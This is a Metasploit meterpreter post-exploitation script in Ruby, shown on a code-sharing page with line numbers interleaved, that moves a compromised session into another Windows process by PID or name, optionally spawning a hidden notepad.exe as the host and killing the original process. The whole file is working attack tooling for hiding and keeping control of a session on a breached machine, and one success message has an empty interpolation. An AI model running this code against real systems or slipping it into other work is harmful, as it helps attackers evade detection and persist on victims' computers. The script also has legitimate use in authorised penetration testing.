Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8

9
#
10
# Simple example script that migrates to a specific process by name.
11
# This is meant as an illustration.
12
#
13

14

15
spawn = false
16
kill = false
17
target_pid = nil
18
target_name = nil
19

20
opts = Rex::Parser::Arguments.new(
21
  "-h" => [ false, "Help menu." ],
22
  "-f" => [ false, "Launch a process and migrate into the new process"],
23
  "-p" => [ true , "PID to migrate to."],
24
  "-k" => [ false, "Kill original process."],
25
  "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
26
)
27

28
opts.parse(args) { |opt, idx, val|
29
  case opt
30
  when "-f"
31
    spawn = true
32
  when "-k"
33
    kill = true
34
  when "-p"
35
    target_pid = val.to_i
36
  when "-n"
37
    target_name = val.to_s
38
  when "-h"
39
    print_line(opts.usage)
40
    raise Rex::Script::Completed
41
  else
42
    print_line(opts.usage)
43
    raise Rex::Script::Completed
44
  end
45
}
46

47
# Creates a temp notepad.exe to migrate to depending the architecture.
48
def create_temp_proc()
49
  # Use the system path for executable to run
50
  cmd = "notepad.exe"
51
  # run hidden
52
  proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
53
  return proc.pid
54
end
55

56
# In case no option is provided show help
57
if args.length == 0
58
  print_line(opts.usage)
59
  raise Rex::Script::Completed
60
end
61

62
### Main ###
63

64
if client.platform == 'windows'
65
  server = client.sys.process.open
66
  original_pid = server.pid
67
  print_status("Current server process: #{server.name} (#{server.pid})")
68

69
  if spawn
70
    print_status("Spawning notepad.exe process to migrate to")
71
    target_pid = create_temp_proc
72
  end
73

74
  if target_name and not target_pid
75
    target_pid = client.sys.process[target_name]
76
    if not target_pid
77
      print_status("Could not identify the process ID for #{target_name}")
78
      raise Rex::Script::Completed
79
    end
80
  end
81

82
  begin
83
    print_good("Migrating to #{target_pid}")
84
    client.core.migrate(target_pid)
85
    print_good("Successfully migrated to process #{}")
86
  rescue ::Exception => e
87
    print_error("Could not migrate in to process.")
88
    print_error(e)
89
  end
90

91
  if kill
92
    print_status("Killing original process with PID #{original_pid}")
93
    client.sys.process.kill(original_pid)
94
    print_good("Successfully killed process with PID #{original_pid}")
95
  end
96
end
97

98